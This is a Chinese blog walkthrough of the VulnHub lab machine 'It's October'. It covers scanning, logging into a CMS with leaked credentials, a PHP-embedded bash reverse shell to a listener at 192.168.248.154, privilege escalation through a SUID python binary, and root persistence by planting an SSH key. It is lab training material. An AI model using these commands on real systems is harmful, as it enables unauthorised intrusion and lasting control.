vulnhub靶机渗透 | It's October

最新推荐文章于 2024-08-06 21:17:04 发布

IsPeterWu

最新推荐文章于 2024-08-06 21:17:04 发布

阅读量1k

点赞数 1

分类专栏： vulnhub 渗透 walkthrough 文章标签：安全

本文链接：https://blog.csdn.net/PeterWuu/article/details/105729668

版权

渗透同时被 3 个专栏收录

3 篇文章 0 订阅

订阅专栏

vulnhub

2 篇文章 0 订阅

订阅专栏

walkthrough

2 篇文章 0 订阅

订阅专栏

这个靶机也算是比较基础的了，整体考察个人基础能力。上说话，多动手。博主的文章编辑能力实在太差，就不弄那些标题第几步什么啥的了，直接渗透它。

靶机下载地址：https://download.vulnhub.com/itsoctober/Its_October.ova

开始：

提醒：如果发现和找不到IP，请翻下之前的文章有详解，这里就不细说了。
1.1 netdiscover、nmap来查找目标机IP以及其开放端口和服务（192.168.248.158）
在这里插入图片描述 1.2 登录80端口看一下，并未发现可直接利用的点或信息
1.3 还有一个8080端口，看一下。在网页源代码中发现可用信息，是一个txt。
1.3.1 打开后发现是一个用户名和密码的信息，先记下来一定有用。
1.4 既然是有用户名密码，那么看一下有没有后台登录点吧！爆破一下目录
在这里插入图片描述 1.4.1 发现此目录，打开后发现了可后台登录的地方
1.4.2 尝试下刚才收集到的用户名密码，成功登录到后台！这里觉得这个靶机如此简单
admin adminadmin2
1.5 进入后台后寻找是否有可部署命令或代码或上传的执行的地方
1.5.1 在cms栏目中选择add，发现了可以进行代码执行的地方，我们可以创建一个函数用来反弹shell。
在这里插入图片描述
1.5.2 经过测试这里可以运行php脚本（必须放在php函数中）
有两个功能，测试了几次大概是如下功能：
markup：所打的代码会呈现在页面中，不做执行。
code：会执行，可以用作反弹。

采用以下触发命令函数：

function onstart(){
      exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.248.154/1234 0>&1'");
}

在这里插入图片描述 1.5.3 同时设置监听

1.5.4 直接打开目标url或通过curl发送http请求触发php脚本：

curl -vv http://192.168.248.158/reverse

反弹成功！
在这里插入图片描述 1.6 目标为普通用户，接下来该进入到提权了
1.6.1 先查找一下suid

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述 1.6.2 发现python为3.7版本，所以去获取交互shell：

python3.7 -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

1.6.3 让当前用户获得一个root 权限

python3.7 -c 'import os;os.execl("/bin/bash","bash","-p")'

在这里插入图片描述 1.6.4 尝试进入下root目录，发现已经可以进入
1.6.5 最后打开.txt，获取到传说中的flag

1.7 但拿到flag并不是最后一步。可以看到我们虽然有euid的root权限，但是其实除了拿flag并没啥卵用，所以接下来还是要变成root权限。

1.7.1 先给大家普及一下关于ssh-keygen的使用方法及配置authorized_keys两台linux机器相互认证的知识：

这个操作是为了让两个Linux机器之间使用ssh不需要用户名和密码直接登录上去。采用了数字签名RSA或者DSA来完成这个操作。假设 A
(192.168.20.59)为客户机器，B(192.168.20.60)为目标机；要达到的目的： A机器ssh登录B机器无需输入密码；
加密方式选 rsa|dsa均可以，默认dsa

具体操作流程

单向登陆的操作过程：
1、登录A机器
2、ssh-keygen -t [rsa|dsa]，将会生成密钥文件和私钥文件id_rsa,id_rsa.pub或id_dsa,id_dsa.pub
3、将 .pub 文件复制到B机器的 .ssh 目录，并在B机器上 cat id_dsa.pub >> ~/.ssh/authorized_keys(或者直接mv id_dsa.pub root/.ssh/authorized_keys进行覆盖)
4、从A机器登录B机器的目标账户，不再需要密码了；（直接运行 ssh root@192.168.0.112 ）

注意：
设置authorized_keys权限 $ chmod 600 authorized_keys
设置.ssh目录权限 $chmod 700 -R .ssh
切记！！！一定要保证.ssh和authorized_keys都只有用户自己有写权限。否则验证无效。

1.7.2 按照如上方法进行操作：关于把.pub密钥发送到目标机上，可以用wget下载和scp或nc，，方法用很多按照自己想做的来。

1.7.3 登录无需密码：
ssh root@192.168.248.158
或：ssh root@192.168.248.158 -i /root/.ssh/id.dsa.pub

1.8 结语
比较关键的就是对于最后ssh登录这一步，折腾好久好久，一定要注意读写权限问题。关于此靶机其他的都比较基础，适用于新手食用。